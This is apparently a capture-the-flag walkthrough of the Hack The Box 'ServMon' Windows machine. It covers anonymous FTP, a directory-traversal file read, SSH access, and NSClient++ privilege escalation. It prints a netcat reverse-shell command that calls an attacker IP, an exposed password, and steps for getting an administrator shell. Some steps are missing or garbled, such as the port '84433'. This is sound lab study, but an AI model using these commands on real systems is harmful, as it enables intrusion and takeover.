This time I am writing the solution for the ServMon box. A easy windows box. Let’s dive into the solution.
🔥 nmap to get the open ports.
nmap -sC -sV -oA initial -Pn 10.10.10.184
First of all the one port I will look is ftp because I have anonymous access allowed.
There is a directory named Users and inside that there are two directories
Nathan containing two files named
Notes to do.txt respectively. It is a good thing at this time to keep notes about these two usernames.
The content of
Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine
I keep in back of my mind that there is file named Passwords.txt in Nathan Desktop folder.
Notes to do.txt:
1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint
There are some incompleted todo’s such as remove public access to NVMS. Remember port 80? Let’s take a look into that.
So this validates the 4th todo. I try to login by using
admin as username and password but nothing. At this point because I don’t have a password, I try to search about vulnerabilites.
I open burp, navigate to 10.10.10.184 intercept the request and then send it to repeater(ctrl+r).
And indeed this works. Now If you remember from
Confidential.txt there is a file with passwords. I get that file.
After trying each of this password with ssh password
Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. nadine@SERVMON C:\Users\Nadine>
We can get user flag now.
After searching the box for hints about root, I find nothing. Going back to nmap we can see a port open
84433 wiht ssl cert. Visiting the site brings up a
Searching with searchsploit turns out there is a privilege escalation.
First we need to get the password of the client from file
; Undocumented key password = ew2x6SsGTxjRwXOT
But the password does not work. Giving us a 403.
Going back to the
nsclient.ini file I see there is present a configuration which does not allow connections from
; Undocumented key allowed hosts = 127.0.0.1
Because I am using ssh I can create a local tunnel from my host to nsclient locally and then access it. By doing this I use a trick to access something like a hidden menu on ssh, and then execute
-L 8443:127.0.0.1:8443. And then go to my browser and access the website with
I now create a .bat script
@echo off C:\Temp\nc.exe 10.10.14.52 9854 -e powershell
and upload it alongside nc.exe inside
C:\Temp\ and setup listener on our local box
Next step is to enable two modules:
After I create a externalscript, with these key and value.(replace fuxsocy.bat with your .bat filename)
Next I setup to run it every minute.
and specify the command, which in our case is rce, which is the name of the external script which will execute the command.
Then I save the Changes under the
Changes button and Under
Control button I reset the service. I wait for 1-2 minutes and get a shell as administrator.